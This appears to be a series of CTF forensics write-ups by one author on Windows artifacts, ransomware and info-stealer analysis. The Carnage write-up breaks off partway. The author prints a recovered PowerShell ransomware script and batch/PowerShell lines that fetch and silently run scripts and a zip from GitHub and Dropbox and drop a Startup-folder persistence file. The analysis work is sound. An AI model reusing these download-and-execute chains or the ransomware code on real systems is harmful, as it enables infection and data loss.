Hey folks,

Today, we’ll be walking through the Forensics challenges I’ve tackled at CAT CTF 25, Insha’allah.

It’s worth mentioning that I’ve got my first First Blood in [Loser] challenge🩸

Note: I’ve added [Erased Traces] challenge with the intended solution, as I was so close to the solution during the CTF but unfortunately couldn’t make it.

Edit: You can find all challenge files here.

Index of Secrets

After extracting the zip archive we got a triage acquisition for the C: drive.

I checked the Recent directory to check the recently accessed files, located in:

C:\Users\wh1pl4sh\AppData\Roaming\Microsoft\Windows\Recent

I found a shortcut .lnk file called flag.txt, pointing to the desktop of the user wh1pl4sh.

So what is the Windows Search Index?

The windows search indexing is a background service that improves the speed and efficiency of searches in windows by pre-building an index of files, emails, and other content on your system.

It works using indexers that scans files/folders and stores metadata like File Name, File Type, Location, Date Modified, Contents (text contents is indexed but punctuation is not)

And saves this data to a local index database, located at:

C:\ProgramData\Microsoft\search\data\applications\windows\Windows.edb

Then when you use windows search, it queries the index instead of scanning the disk.

I used WinSearchDBAnalyzer tool to parse and explore the windows search index database.

Loser

After extracting the zip archive, we got a triage acquisition for almost the C: drive with multiple artifacts missing.

First of all, we are looking for a cracked game that the user downloaded that ended up cracking the system.

We’ve two active users in the system t0orf3n & wh1pl4sh, for now we don’t know which one who’s got infected.

The Downloads folder is missing for both users, so I thought about checking the browser history.

Upon checking common browser artifacts paths for both users, it turns out that only the user t0orf3n has Microsoft Edge browser artifacts available.

Let’s check his browsing history, from the History file located in:

C:\Users\t0orf3n\AppData\Local\Microsoft\Edge\User Data\Default\History

I’ll use DB Browser for SQLite to parse the history database file.

So the user was searching for a crack for a game called Green Hell as stated in the challenge description.

Let’s take a look at the downloads table.

Okay, he downloaded a cracked version with the name GreenHell.crack.exe, we can convert the chrome timestamp in the end_time column to determine when the file was downloaded using epochconverter.com/webkit.

Okay, at this point, I thought I got the first part of the flag, which was asking about the name and path for the malicious file. I mean, we got its name and it was in the Downloads directory right?

Now we wanna determine the time the file was last executed.

So I thought about all the evidence of executions that log the last execution time, starting with prefetch files:

C:\Windows\Prefetch

There was no prefetch file for GreenHell.crack.exe :”

So I headed to UserAssist key.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

Nothing…

I thought about checking the Amcache hive, I know it doesn’t log the last execution time tho, but the hive itself wasn’t available in the artifacts.

Hmm..

Then while I was researching different evidence of executions, I stumbled upon this resource, which talks about PCA(Program Compatibility Assistant).

The PCA is a background Windows feature that identifies and resolves known compatibility issues with older desktop applications on newer versions of the operating system.

It’s a new evidence of execution artifact which was introduced in Windows 11, it’s located in:

 C:\Windows\appcompat\pca

We got three files PcaAppLaunchDic.txt, PcaGeneralDb0.txt, and PcaGeneralDb1.txt.

PcaAppLaunchDic.txt contains the executable file path and the most recent execution timestamp for a given application.

PcaGeneralDb0.txt and PcaGeneralDb1.txt contains general information about the executed application like Runtime, Run status, Executable path, Description of the file and more valuable information.

I opened the PcaAppLaunchDic.txt and searched with our cracked game to get the full path and the execution timestamp.

And then PcaGeneralDb0.txt to get the run status.

Now the full flag will be:

CATF{C:\Users\t0orf3n\AppData\Local\Temp\GreenHell.crack.exe_3_2025-07-12 13:34:17.726}

Dead Icons Speak

After extracting the zip archive, we got another triage acquisition for the C: drive, but with the C:\Windows directory missing.

TBH, at first I didn’t know how to think, and what should I look for…

We have a lot of missing artifacts, the NTUSER.DAT hive was empty, the browser history was empty..

I noticed that we have the $LogFile & $MFT available, so I thought why not to parse the $MFT and check the prefetch files for executed programs.

I used MFTECmd to do so.

MFTECmd.exe -f "MFT file path" --csv "output directory" --csvf "output filename"

Used this command to parse the $MFT file and write the output to a .csv file in the specified directory.

Let’s open the .csv file with Timeline Explorer and search with .pf which is the file extension for prefetch files.

I scrolled a little bit until I noticed this executable filename flagstealer.exe. I think it’s pretty suspicious.

After that I returned to the chall description, maybe I can figure out anything I didn’t notice before.

The sentence an icon rendered into the depth of a forgotten cache made me think to check the rendered icon of the executable we found above.

Honestly, it was my first interaction with icon/thumbnail cache.

These are database files where Windows stores copies of file and folder icons, they’re stored in:

C:\Users\wh1pl4sh\AppData\Local\Microsoft\Windows\Explorer

I used Thumbcache Viewer to open these database files and start loading the iconcache_*.db files.

After some time searching through the icons, we got the flag.

The final flag will be:

CATF{flagstealer.exe:thumbn41l_pwn}

Erased Traces

In this challenge we got a .E01 disk image.

I opened the disk image using FTK Imager.

At first glance we can see four deleted files in the root directory with the names CAT1, CAT2, CAT3, and CAT4.

Our task is to recover these deleted files as the challenge description stated.

The first thing came to my mind is to do file carving.

I used Photorec but it didn’t recover anything, after it I tried R-Studio with no luck also it recovered four files full of null bytes :(

Hmm, ok maybe no luck with file carving..

After that what I thought of was to check if there is any available VSS restore points.

So I mounted the disk image using FTK Imager

File > Image Mounting > Add Image File

It’s very important to mount the disk as writable so the OS has write permissions to this mounted drive so it can access the volume shadow copies.

I used ShadowExplorer to view the shadow copies but to my surprise there weren’t any…

I tried to do it manually, open a command prompt with elevated privileges and list the the available shadow copies for this drive with the drive letter.

vssadmin list shadows /for=F:

Also got nothing..

Ok what else could it be!

I returned to the artifacts and noticed the $LogFile & $MFT, so I exported them from the disk image and then parsed them using NTFS Log Tracker to check the filesystem events for these files.

We can notice the File Creation events for the four files, but the actual important thing is the Data Runs we got in the Details tap.

The Data Run describes where and how much data of a file is stored on disk, it tells the filesystem Start at cluster A and use B clusters.

So here we have the first file CAT1 starting at cluster 994 and allocate 3 clusters, the second file CAT2 starting at cluster 2087 and allocate 3 clusters also and so on.

We need to calculate the Start Offset that the file data starts at.

Start Offset = Cluster Number * Cluster Size

Length = Cluster Count * Cluster Size

The default cluster size is 4096 bytes which consists of 8 sectors each one is 512 bytes

I mounted the disk image and opened it in HxD with the open disk option and select the mounted physical disk.

Now we should calculate the start offset of the first file 994 * 4096 = 0x3E2000 and the length 3 * 4096 = 0x1000

Press Ctrl + E to select a block.

I searched with the offset and length we’ve calculated, it returned a block of null bytes..

I struggled with this for a while, then I asked the author. Shout out ma maan wh1pl4sh for the great challenges <’3

He told me to check the the cluster size again, so I double checked the cluster size.

Right Click on the Mounted Drive > Format

You can also check it from FTK Imager.

So the cluster size is changed to 8192 bytes not the default value

And that’s teaches us to not take anything for granted and always verify…

Now I’ve recalculated our offset and length, but what I was doing wrong during the CTF that I was opening the mounted disk as a Physical Disk not as a Logical Drive so this was also giving me null bytes and dummy data at the correct offset.

After the CTF ended I tried again but I opened the disk as logical drive.

The recalculated offsets (all in hex):

CAT1 -> 944  * 8192 = 7C4000
CAT2 -> 2087 * 8192 = 104E000
CAT3 -> 2236 * 8192 = 1178000
CAT4 -> 2266 * 8192 = 11B4000
Length -> 3  * 8192 = 6000

I searched with the offset of the first file.

Finallyy, it’s a pdf document file header.

I copied this block and pasted it in a new file, and then checked the other files offsets.

Checking the last file CAT4, there is an EOF (End of File) marker.

This means that they’re all segments for the same one file..

This segmentation that prevented the file carving tools from carving anything out, cuz they couldn’t determine where the file began and ended!

Now we need to concatenate all of these four segments.

But first we need to remove all of these null bytes from each file, otherwise the null bytes will overwrite the next segment, and we’ll end up having a corrupted document.

Don’t forget this sneaky byte also, I couldn’t recover the full flag because of this single byte..

Let’s concatenate em’ up.

Now we should be good to go..

Thank you for your time,

I hope you enjoyed the reading and learned something new <’3

If you have any questions, don’t hesitate to reach out at: OG13

Hey folks,

Today, we’ll be walking through the Forensics challenges I’ve tackled in L3akCTF 2025, Insha’allah.

Ghost in The Dark

After downloading the challenge file, we’re dealing with a disk image, as the challenge description states that a removable drive was recovered from a compromised system, and some sort of file encryption had taken place, so let’s take a closer look and find out what happened.

I opened the disk image in FTK Imager.

At first glance, I found some encrypted files, a ransom note ransom_note.txt, and a deleted powershell script loader.ps1.

The powershell script can be recovered easily, as it hasn’t been wiped from the disk.

Instead, the $MFT (Master File Table) entry was just marked as unlinked, so the data is still present on the disk until overwritten.

$key = [System.Text.Encoding]::UTF8.GetBytes("0123456789abcdef")
$iv  = [System.Text.Encoding]::UTF8.GetBytes("abcdef9876543210")

$AES = New-Object System.Security.Cryptography.AesManaged
$AES.Key = $key
$AES.IV = $iv
$AES.Mode = "CBC"
$AES.Padding = "PKCS7"

$enc = Get-Content "L:\payload.enc" -Raw
$bytes = [System.Convert]::FromBase64String($enc)
$decryptor = $AES.CreateDecryptor()
$plaintext = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
$script = [System.Text.Encoding]::UTF8.GetString($plaintext)

Invoke-Expression $script

# Self-delete
Remove-Item $MyInvocation.MyCommand.Path

It’s a simple powershell decryptor. It’s decrypting an encrypted file called payload.enc which uses the AES encryption algorithm with the CBC mode. It decodes the content of the payload.enc file from base64, starts the decryption process, and then converts decrypted bytes to UTF-8 encoding.

I exported the payload.enc file and opened it in CyberChef to decrypt its content.

Using from Base64then AES Decrypt plugins with the Key and IV from the ps1 script.

$key = [System.Text.Encoding]::UTF8.GetBytes("m4yb3w3d0nt3x1st")
$iv  = [System.Text.Encoding]::UTF8.GetBytes("l1f31sf0rl1v1ng!")

$AES = New-Object System.Security.Cryptography.AesManaged
$AES.Key = $key
$AES.IV = $iv
$AES.Mode = "CBC"
$AES.Padding = "PKCS7"

# Load plaintext flag from C:\ (never written to L:\ in plaintext)
$flag = Get-Content "C:\Users\Blue\Desktop\StageRansomware\flag.txt" -Raw
$encryptor = $AES.CreateEncryptor()
$bytes = [System.Text.Encoding]::UTF8.GetBytes($flag)
$cipher = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[System.IO.File]::WriteAllBytes("L:\flag.enc", $cipher)

# Encrypt other files staged in D:\ (or L:\ if you're using L:\ now)
$files = Get-ChildItem "L:\" -File | Where-Object {
    $_.Name -notin @("ransom.ps1", "ransom_note.txt", "flag.enc", "payload.enc", "loader.ps1")
}

foreach ($file in $files) {
    $plaintext = Get-Content $file.FullName -Raw
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($plaintext)
    $cipher = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
    [System.IO.File]::WriteAllBytes("L:\$($file.BaseName).enc", $cipher)
    Remove-Item $file.FullName
}

# Write ransom note
$ransomNote = @"
i didn't mean to encrypt them.
i was just trying to remember.

the key? maybe it's still somewhere in the dark.
the script? it was scared, so it disappeared too.

maybe you'll find me.
maybe you'll find yourself.

- vivi (or his ghost)
"@
Set-Content "L:\ransom_note.txt" $ransomNote -Encoding UTF8

# Self-delete
Remove-Item $MyInvocation.MyCommand.Path

It turns out to be the actual powershell encryptor or the payload.

It encrypts the contents of the flag.txt file on the C: drive, then it writes the encrypted data to flag.enc on the L: drive, which is probably the removable drive.

Then it encrypts any other file in this removable drive except for a list of filenames:

["ransom.ps1", "ransom_note.txt", "flag.enc", "payload.enc", "loader.ps1"]

Lastly, it writes the contents of the ransom note to the ransom_note.txt file and deletes itself.

Once again, export the flag.enc file from the disk image and open it in CyberChef, using the AES Decrypt plugin with the Key and IV used in the powershell encryptor script.

TTPs

• Execution: Command and Scripting Interpreter: PowerShell (T1059.001)
• Defense Evasion: Indicator Removal: File Deletion (T1070.004)
• Collection: Data from Local System (T1005)
• Impact: Data Encrypted for Impact (T1486)

BOMbardino crocodile

After extracting the zip archive, we got a triage acquisition for the Users directory C:\Users, and an .eml file that the challenge description mentioned.

You can open it using any email client or software. I used Thunderbird

This email was sent from the compromised machine by the attacker, as the challenge description states.

What really caught my eye was this Discord server invitation, and the line below, which the attacker says to his operative, that there are data leaks for people who clicked on their brainrot exam!

We don’t know what this exam is yet, let’s take a look at the discord server.

Ohh..

So they’re selling these leaked data and screenshots for $500 at the channel called lobsterl3aks.

From what I can see, screenshots, passwords, public IPs, and system information, this is likely an Info Stealer behavior.

So let us leave this discord server for now and start with the artifacts we have, to understand what happened, how this stealer got onto the user’s machine, and what the infection flow is.

I started with the Downloads folder for the user crustacean.

Alright, this doesn’t look good. There is a batch script and a pdf file named lil-l3ak-exam.pdf, let’s take a closer look at what’s inside this pdf file.

Hmm, so this is the brainrot exam mentioned before in the attacker’s email to his operative.

The pdf contains a downloadable link for a zip archive named Lil-L3ak-secret-plans-for-tonight.zip, which is the same name as the batch script, so this zip archive contains a batch script disguised as an exam.

Everything is clear now, this is a spearphishing attempt, as the pdf file contains the victim’s username, so it’s not a public info stealer campaign that’s probably distributed in a mass email distribution, or cracked software or games.

Let’s check the contents of the batch script.

I tried to open it with Notepad++, but there were some strange bytes FF FE at the beginning of the file, resulting in incorrect file encoding.

I did a quick research and it turned out to be something called Byte Order Mark (BOM) for UTF-16 Little Endian encoding, which indicates that the file was saved as UTF-16 LE. I tried to convert it from UTF-16 to ANSI or UTF-8, but for some reason it didn’t work for me.

So I opened it with HxD (the hex editor of my choice).

I replaced the first two bytes with null bytes and saved the file, and opened it again in Notepad++.

The script was full of nonsensical sentences echoed on the screen as a sort of obfuscation, so I kept scrolling until I found this.

start /min cmd /c "powershell -WindowStyle Hidden -Command 
Invoke-WebRequest -Uri 'https://github.com/bluecrustacean/oceanman/raw/main/t1-l3ak.bat' -OutFile '%TEMP%\temp.bat';
Start-Process -FilePath '%TEMP%\temp.bat' -WindowStyle Hidden"

For this part of the script, it starts cmd.exe in a minimized window, then passes the next Powershell command as a parameter to be executed by cmd.exe.

The powershell command executes in a hidden window, makes a request to a GitHub repo that contains another batch script, downloads this script in the %TEMP% path with the name temp.bat, and lastly executes this script with the Start-Process cmdlet in a hidden window.

The %TEMP% environment variable refers to the path:

C:\Users\<username>\AppData\Local\Temp

Let’s check out this path and see what’s in there.

Yep, it’s right there.

Again, those BOM bytes, I did the same thing and opened the file in Notepad++. I found the same technique as the previous batch script. I kept scrolling until I found this powershell script.

start /min powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
(New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bluecrustacean/oceanman/raw/main/ud.bat', '%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat');
(New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/uuhwziczwa79d6r8erdid/T602.zip?rlkey=fq4lptuz5tvw2qjydfwj9k0ym&st=mtz77hlx&dl=1', 'C:\\Users\\Public\\Document.zip');
Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document');
Start-Sleep -Seconds 60;
C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\leak.py;
Remove-Item 'C:/Users/Public/Document.zip' -Force" && exit

The script downloaded another batch script called WindowsSecure.bat and saved it to the startup folder as a persistence mechanism so that each time the device boots, this script executes.

C:\Users\crustacean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat

The next part of the script downloads a zip archive called Document.zip into the Public user’s directory. The file is hosted on Dropbox, a cloud-based file storage service.

Then extract this archive, sleep for 60 seconds, then execute a python script called leak.py stored at:

C:\Users\Public\Document\Lib\leak.py

And lastly, it deletes the Document.zip archive.

Let’s take a look at the contents and functionalities of this python script.

Once I opened it, I found a very long commented line of random letters, which is the same technique used in the batch scripts to hide the real script.

I found a Lambda function that takes a reversed base64 encoded string, decodes it, and then executes the result using the exec() function.

I used CyberChef to decode the script and discovered that it was encoded using this technique five times in a row. So, to uncover the original source code, you need to reverse and base64 decode the string five times until you reach the final payload.

From the first look at the script, I realized that this is the source code of the stealer.

Briefly, the stealer contains functionalities like Stealing:

1. Geolocation Data

2. Discord Tokens

3. System Information

4. CPU, Memory & Network Info

5. Google Chrome Passwords & Cookies

6. Screenshot Capture

When I checked the screenshot capability, I found that the stealer grabs a screenshot and saves it to the path:

C:\ProgramData\pay2winflag.jpg

This section of the code takes the grabbed screenshot, then encrypts it using the RC4 cipher with the key tralalero_tralala. Then adds the .enc extension to be recognized as encrypted.

After that, it sends the encrypted image to the discord server using the Channel ID and the Bot Token embedded in the script.

This is the image that we found when we joined the LobsterLeaks discord server at the beginning.

There were two images on the server, so I downloaded them. Then I used this image encryptor section and made some changes to it to decrypt the images.

from Crypto.Cipher import ARC4

screenshot_path = r'C:\Users\og13\Desktop\BOMbardino_crocodilo'
encrypted_image = screenshot_path + r'\pay2winflag.jpg.enc'

with open(encrypted_image, 'rb') as f:
 image_data = f.read()

key = b'tralalero_tralala'
cipher = ARC4.new(key)
decrypted_data = cipher.decrypt(image_data) # use decrypt() func instead of encrypt()

decrypted_image = screenshot_path + r'\pay2winflag.jpg'
with open(decrypted_image, 'wb') as f:
 f.write(decrypted_data)

Make sure you have all these packages installed first.

python -m pip install crypto
python -m pip install pycryptodome
python -m pip install tuyapower

And finally, we got the second part of the flag.

At this point, I didn’t know what to do. Were there any other artifacts that I didn’t notice?

The other image was just a copy of the same image. I also checked the passwords.zip archive on the server, but it contained an empty passwords.txt file.

Oh, I forgot the WindowsSecure.bat script that was dropped into the startup folder used as a persistence mechanism. We didn’t check that one.

Once I opened it, I realized that the first part of the flag would be there.

The script assigns two random letters to each letter of the alphabet, plus some other special characters and numbers. It contains a long text, between each two characters there is a (%%).

I replaced each of these random letters with its original character. You can make a script for this, but I made it manually and it worked fine.

After replacing all the letters and characters, I searched for L3AK, which is the first part of the flag, but with (%%) between each letter.

The final flag will be:

L3AK{Br40d0_st34L3r_0r_br41nr0t}

TTPs

• Initial Access: Phishing: Spearphishing Attachment (T1566.001)
• Execution: Command and Scripting Interpreter: PowerShell (T1059.001), Python (T1059.006)
• Persistence: Boot or Logon Autostart Execution: Startup Folder (T1547.001)
• Defense Evasion: Obfuscated Files or Information: Embedded Payloads (T1027.009), Command Obfuscation (T1027.010)
• Credential Access: Credentials from Password Stores: Credentials from Web Browsers (T1555.003)
• Discovery: System Information Discovery (T1082), System Location Discovery (T1614)
• Collection: Data from Local System (T1005), Screen Capture (T1113)
• Exfiltration: Exfiltration Over Web Service (T1567)

Wi-Fight A Ghost?

This challenge consisted of 14 questions:

1. What was the ComputerName of the device?
2. What was the SSID of the first Wi-Fi network they connected to?
3. When did they obtain the DHCP lease at the first café?
4. What IP address was assigned at the first café?
5. What GitHub page did they visit at the first café?
6. What did they download at the first café?
7. What was the name of the notes file?
8. What are the contents of the notes?
9. What was the SSID of the second Wi-Fi network they connected to?
10. When did they obtain the second lease?
11. What was the IP address assigned at the second café?
12. What website did they log into at the second café?
13. What was the MAC address of the Wi-Fi adapter used?
14. What city did this take place in?

After extracting the zip archive, we got a triage acquisition for almost the C: drive, but without some of the user’s files and directories.

1. What was the ComputerName of the device?

The computer name information can be found in the SYSTEM hive.

All the Local Machine hives (HKLM) are located at the following path:

C:\Windows\System32\config

The computer name can be found in the SYSTEM hive at the following key:

HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

I used the famous tool Registry Explorer by Eric Zimmerman, you can find all of his tools here.

1. 99PHOENIXDOWNS

2. What was the SSID of the first Wi-Fi network they connected to?

Information about Network Interfaces could be found at the following key:

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces

The DHCPNetworkHints tap contains information about the wireless network (SSID) and its associated DHCP server, assigned IP addresses, and DHCP lease time.

In the question, he wants the SSID of the first connected network. There are two networks AlleyCat & mugs_guest_5G, but from the lease obtained time, we can determine which one of them was the first network.

The lease obtained or lease start time is the time at which a device first connects to a network. So we found that the network mugs_guest_5G has a lease obtained at 2025–05–14 00:13:36 which is less than the lease obtained for the network AlleyCat, which is 2025–05–14 00:35:07.

2. mugs_guest_5G

3. When did they obtain the DHCP lease at the first café?

We already got that.

3. 2025-05-14 00:13:36

4. What IP address was assigned at the first café?

The DHCP Address of the mugs_guest_5G SSID in the above image.

4. 192.168.0.114

5. What GitHub page did they visit at the first café?

Now we’re getting into browser forensics, we want to know what was the browsing history at the timeframe of the first café.

I’ll check Chrome browser history file, which is stored in:

C:\Users\NotVi\AppData\Local\Google\Chrome\User Data\Default\History

I’ll use DB Browser for SQLite to open the history file.

So we couldn’t see any GitHub pages here, let’s check the timestamp for the first search made using epochconverter.com/webkit.

The time is 2025–05–14 12:36:08 which is not in the timeframe of the first café.

So we need to check if there are any other browsers he used to do so.

I checked the UserAssist key, it’s strong evidence of execution, which will allow us to know what other browsers the user has used.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

So the user used both Google Chrome and Microsoft Edge browsers, but Edge was last executed during the timeframe of the first café 2025–05–14 00:17:01 Chrome was last executed at 2025–05–14 00:35:15.

Let’s check the Edge browser history file, which is stored in:

C:\Users\NotVi\AppData\Local\Microsoft\Edge\User Data\Default\History

There is this one GitHub page, let’s double-check and validate that the timestamp of it is in the timeframe of the first café.

It’s in the same timeframe, it’s valid, so this is the answer.

5. https://github.com/dbissell6/DFIR/blob/main/Blue_Book/Blue_Book.md

6. What did they download at the first café?

Go to the downloads tab.

6. ChromeSetup.exe

7. What was the name of the notes file?

This was the only text file the user was opening, so I thought this was the notes file, and it was.

7. HowToHackTheWorld.txt

8. What are the contents of the notes?

Alright, to understand this part, we have to explain something first.

The Master File Table (MFT) is a special system file used by the NTFS file system. It functions as a database that stores detailed information about every file and directory on the volume, including metadata, file contents, and their physical location on disk.

Each MFT record is typically 1024 bytes (1 KB) in size.

Files smaller than ~700 bytes are often stored directly within the MFT record itself. This is called resident data.

Files larger than that are stored elsewhere on the disk in data clusters, and the MFT record contains pointers to those clusters. These are called non-resident data.

Understanding how the MFT stores data is essential to solving this question.

The $MFT file is located at the root of the volume C:\$MFT.

I used MFTECmd to parse the MFT file and write the output to a .csv file.

MFTECmd.exe -f "MFT file path" --csv "output directory" --csvf "output filename"

Let’s open the .csv file with Timeline Explorer and search with the filename.

Found it, the file is only 29 bytes This should be resident for sure, let’s check it and see what’s in there.

I opened the MFT file in HxD and searched with the filename.

So the answer is:

8. Practice and take good notes.

9. What was the SSID of the second Wi-Fi network they connected to?

We got that before.

9. AlleyCat

10. When did they obtain the second lease?

Got this one before also.

10. 2025-05-14 00:35:07

11. What was the IP address assigned at the second café?

The DHCP Address of the AlleyCat SSID.

11. 10.0.6.28

12. What website did they log into at the second café?

Let’s check Chrome’s history one more time real quick.

All the URLs visited are the same website.

12. l3ak.team

13. What was the MAC address of the Wi-Fi adapter used?

The question asks for the MAC address of the Wireless Network Adapter used in the machine.

One of the best sources you can get from Wi-Fi adapter activity, it contains MAC address, adapter name, SSID, and connection information, is the WLAN-AutoConfig event log. Stored at:

C:\Windows\System32\winevt\logs\Microsoft-Windows-WLAN-AutoConfig%4Operational.evtx

I opened the event log with the Event Log Explorer tool.

So, since he wants the MAC address, the answer would be.

13. 48:51:C5:35:EA:53

14. What city did this take place in?

I had a really bad time with this question :(

At first, I tried wigle.net with the BSSID from both of the wireless networks, but unfortunately, it didn’t return anything.

I was looking for any public IPs I could use to make an online search with it in order to get the location, but also found nothing.

I got the Geographical Location (Country) from the key:

HKCU\Control Panel\International\Geo

Now I know the country is USA.

And also got the Timezone information from the key:

HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation

The Timezone is MDT (Mountain Daylight Time).

I continued digging through the system logs, until I stumbled upon the WebCache directory:

C:\Users\NotVi\AppData\Local\Microsoft\Windows\WebCache

The WebCache stores the WebCacheV01.dat database and several log files.

It’s main purpose is to cache browsing data and track internet-related activity.

The V01.log is a transaction log file used alongside the main database WebCache.dat.

I opened this log file in Notepad and scrolled a little bit.

Until this clientLocation tag instantly caught my eye.

I sent the whole URL to ChatGPT to analyze it, and it turned out to be that this decimal number clientLocation=40.57873710006415280%7C-105 is a coordinates.

Latitude = 40.57873710006415280, Longitude = -105

I used GPS Coordinates

And Finallyyy..

14. Fort Collins

Thank you for your time,

I hope you enjoyed the reading <’3

If you have any questions, don’t hesitate to reach out at: 0g13

Hello Everybody, This is my write-up for the forensics challenges in WolvCTF, I was able to solve 3 out of 5 challenges.

Let’s get into it.

Eternally Pwned: Infiltration

Category: Network Forensics

Challenge link: download

This was an easy one, I kept looking through the packets of the pcap file.

Filtered for “http” protocol to see if there is any suspicious connections or downloaded files might got the flag but found nothing useful.

While navigating I saw this base64 encoding in this echo request.

Let’s decode it and see what it is.

Ohhh, it’s the first part of our flag.

Follow the tcp stream of this packet.

Let’s see if the rest of the flag is in there.

Yup found the second and third part of the flag, let’s decode them now.

flag: wctf{l3tS_3teRn4lLy_g0_bLU3_7n9wm4iWnL}

Eternally Pwned: Persistence

Category: Memory Forensics

Challenge link: download

After unzipping the MEMORY.zip file it’s a memory dump file, so I will use the most popular tool for memory forensics volatility, but I prefer volatility3.

At the beginning we need to know the running processes with the plugin pslist.

python3 vol.py -f MEMORY.DMP windows.pslist.PsList

I noticed the the cmd.exe process and this encoded process also.

Starting with the cmd I used the cmdline plugin but I found nothing useful.

So I went for the second process and decoded this base64 encoding.

Hmmm, maybe the flag would be in a pastebin link or something, so lets dump it with memmap plugin and it’s pid then rename it.

python3 vol.py -f MEMORY.DMP -o output windows.memmap.Memmap --dump --pid 1804

I tried to grep for “wctf” or “pastebin” with the strings command from the file but got nothing, and then I thought to grep with the encoded process name maybe it’s the first part of the link as when we decoded it was “pastebin.c”

We got the full process name, lets decode it.

Got the link lets open it.

And we got our flag.

flag: wctf{v0lAt1l3_m3m0ry_4qu1r3D_a3fe9fn3al}

Log Analysis

Category: Log Analysis

Challenge link: download

I opened the txt file and start navigating the logs.

I found some encoded domain names, so I thought the flag would be some of those encoded domain names and put them all together, but when I tried to decode them it’s all garbage.

I also noticed that the http request headers are all the same except the “Host” , and also the logs file was large.

So I filtered it out to be easier to analyze.

cat logs.txt | sort | uniq > filtered_logs.txt

In the challenge description he mentioned that they took down all their “wolvsecsolutions” websites, so lets check on this detail.

I tried to grep for “wolvsecsolutions” in the filtered logs file.

Something really caught my eyes which is this url looks similar to the urls in the misc challenges, and also all the other websites weren’t working, let’s open it and see what it got for us.

Didn’t expect this but we got our flag.

flag: wctf{ph1sh3r5_l0v3_c0py1ng_d0m41n_n4m35}

Thank you for reading, I hope you enjoyed <3

You can find me at: https://www.linkedin.com/in/0G13

Let’s start with Beginner challenges.

Challenge 1: Forensics: Hidden Data

He said “comment”, so first thing i thought is to see the meta data using exiftool

and here is the flag.

flag: wctf{h1dd3n_d4t4_n0T_s0_h1dD3N}

Challenge 2: OSINT: Redditor

I googled it using google dorks searching for WolvSec reddit account including “flag” keyword in the output.

open the link.

flag: wctf{h41l_t0_th3_v1ct0rs_v4l14nt_h41L_t0_tH3_c0Nqu3r1nG_h3r035}

Let’s start in the Misc challenges now.

challenge 3: Made Sense

Challenge link: https://madesense-okntin33tq-ul.a.run.app

There is two input fields and a source code link, let’s see the source code first.

Ok, after a while to understand the code.

It’s a flask application provides a web interface for running code using makefile. It takes linux commands in the code field, and it validates for the target_name that it must contain characters upper and lower case and digits only, and the code field can’t have “\n” and can’t contain “flag” keyword in it or it will returns “no”. And then prints the output in the stdout or if there is an error it prints it in the stderr.

I tried running basic commands like “ls”

It worked, ok let’s cat the flag.txt.

remember it validates for “flag” in code field.

after thinking I used the wildcard “*” for printing all files in the directory, though there is no files except the flag.txt

and BOOM! there is the flag.

flag: wctf{m4k1ng_vuln3r4b1l1t135}

challenge 4: Made Functional

Challenge link: https://madefunctional-okntin33tq-ul.a.run.app

This is the modified version of Made Sense.

The difference is that it puts the /bin/bash shell in an environment where the PATH variable has been modified, by this modification it restricts how the shell finds and executes other commands, left us with the built in commands only. And it also validates for “/” instead of “flag” in Made Sense.

So when I try to run commands which isn’t a built in like “ls” , “cat” , etc.

It gives me there is no such file.

After a lot and a lot of searching and trying, I reached the “source” command, which is used for reading and executing commands from a file. like if you have an executable called file.sh

./file.sh

you run the file like this, but the code validates for the “/” and it prints no. But with the source command.

BOOOOM!!

flag: wctf{m4k1ng_f1l3s}

Note: it gives an error because the flag isn’t a linux command by any means.

Thank you for reading, I hope you enjoyed <3

Free Palestine and Ramadan Kareem

You can reach me at: https://www.linkedin.com/in/0G13

Hello guys, this is my first write-up and we will be walking through carnage challenge from TryHackMe.

Challenge: https://tryhackme.com/room/c2carnage

Category: traffic analysis

Difficulty level: medium

Scenario

Eric Fischer from the Purchasing Department at Bartell Ltd has received an email from a known contact with a Word document attachment. Upon opening the document, he accidentally clicked on “Enable Content.” The SOC Department immediately received an alert from the endpoint agent that Eric’s workstation was making suspicious connections outbound. The pcap was retrieved from the network sensor and handed to you for analysis.

Task: Investigate the packet capture and uncover the malicious activities.

Tools

• Wireshark

Q1

What was the date and time for the first HTTP connection to the malicious IP?

(answer format: yyyy-mm-dd hh:mm:ss)

He asks for HTTP connection so I filtered for http traffic only.

Then look at the time for the first packet from the Time field.

I also changed the display time format from view > Time display format > Date and time of day.

Ans: 2021–09–24 16:44:38

Q2

What is the name of the zip file that was downloaded?

Follow TCP stream for the first packet from the previous screenshot.

You can clearly see the downloaded zip file.

Ans: documents.zip

Q3

What was the domain hosting the malicious zip file?

From the same TCP stream.

Ans: attirenepal.com

Q4

Without downloading the file, what is the name of the file in the zip file?

Scroll a bit down, that is the strings of the zip file and you can notice the .xls file there.

It’s an excel file.

Ans: chart-1530076591.xls

Q5

What is the name of the webserver of the malicious IP from which the zip file was downloaded?

It’s obvious in the http response.

Ans: LiteSpeed

Q6

What is the version of the webserver from the previous question?

From the same http response.

Ans: PHP/7.2.34

From here it’s going to be a bit spicy.

Q7

Malicious files were downloaded to the victim host from multiple domains. What were the three domains involved with this activity?

Honestly, I stuck here so I went for the hint.

Ok, for this I used this filter, which filters for the packets in between 16:45:11 and 16:45:30.

frame.time >= "Sep 24, 2021 16:45:11.000000" && frame.time <= "Sep 24, 2021 16:45:30.000000

I went for the client hello packet which is the start of the HTTPS traffic, and then follow TCP stream.

And found the first domain.

I start navigating through the streams after this in the same timeframe.

And found the second domain.

